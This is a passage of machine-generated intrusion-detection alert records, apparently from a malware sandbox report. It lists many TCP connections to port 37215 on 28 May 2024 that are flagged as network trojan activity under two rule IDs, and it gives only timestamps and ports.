            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486795
            SID:2829579
            Source Port:47672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368175
            SID:2829579
            Source Port:41520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.759186
            SID:2835222
            Source Port:59968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811457
            SID:2835222
            Source Port:58344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565890
            SID:2829579
            Source Port:38966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839661
            SID:2835222
            Source Port:52850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742991
            SID:2829579
            Source Port:60304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029291
            SID:2829579
            Source Port:44588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745117
            SID:2829579
            Source Port:49366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810747
            SID:2835222
            Source Port:55872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943264
            SID:2835222
            Source Port:58334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.622239
            SID:2835222
            Source Port:51794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857190
            SID:2829579
            Source Port:59898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879747
            SID:2829579
            Source Port:55064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670380
            SID:2829579
            Source Port:36188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290854
            SID:2829579
            Source Port:36660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855171
            SID:2835222
            Source Port:51354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776197
            SID:2835222
            Source Port:39252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939060
            SID:2829579
            Source Port:41738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.438593
            SID:2835222
            Source Port:38696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300128
            SID:2835222
            Source Port:36194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824557
            SID:2829579
            Source Port:54258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605633
            SID:2829579
            Source Port:37986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.947821
            SID:2835222
            Source Port:36360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862071
            SID:2829579
            Source Port:50504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563293
            SID:2829579
            Source Port:60700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936273
            SID:2835222
            Source Port:43252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927016
            SID:2829579
            Source Port:52852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313186
            SID:2835222
            Source Port:50294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.687348
            SID:2835222
            Source Port:50742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180514
            SID:2829579
            Source Port:57160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654541
            SID:2829579
            Source Port:45806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879443
            SID:2835222
            Source Port:43162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941672
            SID:2835222
            Source Port:52260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057818
            SID:2829579
            Source Port:34784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679841
            SID:2829579
            Source Port:38430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.710561
            SID:2829579
            Source Port:50876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919928
            SID:2835222
            Source Port:53394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052861
            SID:2829579
            Source Port:59656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341077
            SID:2829579
            Source Port:49112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863546
            SID:2829579
            Source Port:60244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923542
            SID:2829579
            Source Port:50850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854394
            SID:2829579
            Source Port:41030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.582006
            SID:2835222
            Source Port:51066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920307
            SID:2835222
            Source Port:48736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767432
            SID:2835222
            Source Port:46332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857059
            SID:2835222
            Source Port:60706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.950312
            SID:2829579
            Source Port:58324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853911
            SID:2835222
            Source Port:45174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759920
            SID:2829579
            Source Port:60754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038348
            SID:2835222
            Source Port:45170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917199
            SID:2829579
            Source Port:40666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766872
            SID:2835222
            Source Port:44450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936947
            SID:2829579
            Source Port:60442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956804
            SID:2835222
            Source Port:47166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764753
            SID:2829579
            Source Port:54446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759663
            SID:2835222
            Source Port:46804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809925
            SID:2835222
            Source Port:53680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.540434
            SID:2829579
            Source Port:51392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675321
            SID:2835222
            Source Port:56196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790011
            SID:2835222
            Source Port:55952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741992
            SID:2829579
            Source Port:38404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910279
            SID:2835222
            Source Port:40556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994868
            SID:2829579
            Source Port:44640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330519
            SID:2835222
            Source Port:43066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.739149
            SID:2835222
            Source Port:52608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965771
            SID:2829579
            Source Port:35574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.481084
            SID:2835222
            Source Port:33692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730234
            SID:2835222
            Source Port:41224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.084235
            SID:2835222
            Source Port:57234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.518013
            SID:2829579
            Source Port:34394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910025
            SID:2829579
            Source Port:40482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.613050
            SID:2835222
            Source Port:50378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.040987
            SID:2829579
            Source Port:56682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.356840
            SID:2829579
            Source Port:38528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868391
            SID:2829579
            Source Port:48296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740177
            SID:2835222
            Source Port:46742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343046
            SID:2835222
            Source Port:50344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.849804
            SID:2829579
            Source Port:41952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925289
            SID:2829579
            Source Port:46552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.941361
            SID:2835222
            Source Port:45978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.347887
            SID:2835222
            Source Port:58262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655666
            SID:2829579
            Source Port:36648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849688
            SID:2829579
            Source Port:49608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804105
            SID:2829579
            Source Port:38118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375198
            SID:2835222
            Source Port:45894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279761
            SID:2829579
            Source Port:47296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310580
            SID:2835222
            Source Port:48074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.076843
            SID:2829579
            Source Port:43020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.898979
            SID:2835222
            Source Port:52498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965845
            SID:2829579
            Source Port:59662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812578
            SID:2829579
            Source Port:49052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.011171
            SID:2829579
            Source Port:48868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773752
            SID:2829579
            Source Port:55536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762068
            SID:2835222
            Source Port:45998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388714
            SID:2829579
            Source Port:33812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969738
            SID:2835222
            Source Port:36660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.372495
            SID:2829579
            Source Port:49262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057930
            SID:2829579
            Source Port:53966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326651
            SID:2835222
            Source Port:54620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.591666
            SID:2835222
            Source Port:43848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252063
            SID:2835222
            Source Port:46128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754694
            SID:2835222
            Source Port:37718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893970
            SID:2835222
            Source Port:34978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615241
            SID:2835222
            Source Port:42830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717331
            SID:2829579
            Source Port:39720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086649
            SID:2829579
            Source Port:53668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994709
            SID:2835222
            Source Port:48162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374341
            SID:2835222
            Source Port:60476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508128
            SID:2829579
            Source Port:58296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811075
            SID:2829579
            Source Port:47498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388926
            SID:2829579
            Source Port:47246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392453
            SID:2835222
            Source Port:41366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518641
            SID:2835222
            Source Port:53690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320509
            SID:2829579
            Source Port:42346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605049
            SID:2835222
            Source Port:55262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812071
            SID:2829579
            Source Port:44714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784124
            SID:2829579
            Source Port:35898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.475522
            SID:2835222
            Source Port:47600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423357
            SID:2829579
            Source Port:56544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.580886
            SID:2835222
            Source Port:43806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400133
            SID:2835222
            Source Port:35606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611524
            SID:2829579
            Source Port:60100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261199
            SID:2835222
            Source Port:53830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.950306
            SID:2829579
            Source Port:35600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777355
            SID:2829579
            Source Port:44054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065224
            SID:2835222
            Source Port:57176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691732
            SID:2835222
            Source Port:42170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058869
            SID:2829579
            Source Port:37432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655520
            SID:2829579
            Source Port:55802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.441889
            SID:2835222
            Source Port:41666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.440223
            SID:2835222
            Source Port:54752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046420
            SID:2835222
            Source Port:36792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925443
            SID:2835222
            Source Port:48988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655853
            SID:2835222
            Source Port:60080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.950254
            SID:2835222
            Source Port:34166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734713
            SID:2835222
            Source Port:42560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296178
            SID:2835222
            Source Port:59656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857760
            SID:2829579
            Source Port:60748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997957
            SID:2829579
            Source Port:43586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.743783
            SID:2829579
            Source Port:35022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882556
            SID:2835222
            Source Port:59634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930266
            SID:2829579
            Source Port:49250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.726477
            SID:2835222
            Source Port:59518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676559
            SID:2835222
            Source Port:41816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.517559
            SID:2835222
            Source Port:49648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542548
            SID:2835222
            Source Port:54928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896244
            SID:2835222
            Source Port:46018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979352
            SID:2829579
            Source Port:34352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774141
            SID:2829579
            Source Port:34262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071065
            SID:2829579
            Source Port:45248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807429
            SID:2835222
            Source Port:56654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863665
            SID:2835222
            Source Port:46602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935329
            SID:2835222
            Source Port:38688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728783
            SID:2829579
            Source Port:58248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086692
            SID:2835222
            Source Port:53402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.357362
            SID:2829579
            Source Port:56318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679788
            SID:2835222
            Source Port:45194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.451032
            SID:2835222
            Source Port:36872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696827
            SID:2829579
            Source Port:56964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368401
            SID:2829579
            Source Port:54438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.942330
            SID:2835222
            Source Port:39722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.872293
            SID:2829579
            Source Port:54860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.738669
            SID:2829579
            Source Port:58736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510013
            SID:2829579
            Source Port:56062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847192
            SID:2835222
            Source Port:42270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.358419
            SID:2829579
            Source Port:49442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929472
            SID:2829579
            Source Port:55296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.710535
            SID:2829579
            Source Port:47338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922239
            SID:2829579
            Source Port:40184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870414
            SID:2829579
            Source Port:50814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957235
            SID:2829579
            Source Port:50496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062911
            SID:2835222
            Source Port:59002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.349233
            SID:2835222
            Source Port:43740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930971
            SID:2835222
            Source Port:47062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291802
            SID:2835222
            Source Port:35658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777817
            SID:2835222
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334267
            SID:2835222
            Source Port:59576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563316
            SID:2835222
            Source Port:56054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.070954
            SID:2829579
            Source Port:51372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280509
            SID:2835222
            Source Port:57494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862900
            SID:2829579
            Source Port:53188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299951
            SID:2835222
            Source Port:37792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333785
            SID:2829579
            Source Port:57248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073055
            SID:2835222
            Source Port:57886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905680
            SID:2829579
            Source Port:37270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.845050
            SID:2835222
            Source Port:55112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864701
            SID:2835222
            Source Port:54862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744011
            SID:2835222
            Source Port:43094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745173
            SID:2835222
            Source Port:35708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754597
            SID:2829579
            Source Port:48494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563448
            SID:2835222
            Source Port:54350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.792791
            SID:2835222
            Source Port:50682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052382
            SID:2835222
            Source Port:59738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327516
            SID:2835222
            Source Port:58944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.867995
            SID:2835222
            Source Port:44204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760306
            SID:2829579
            Source Port:50298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
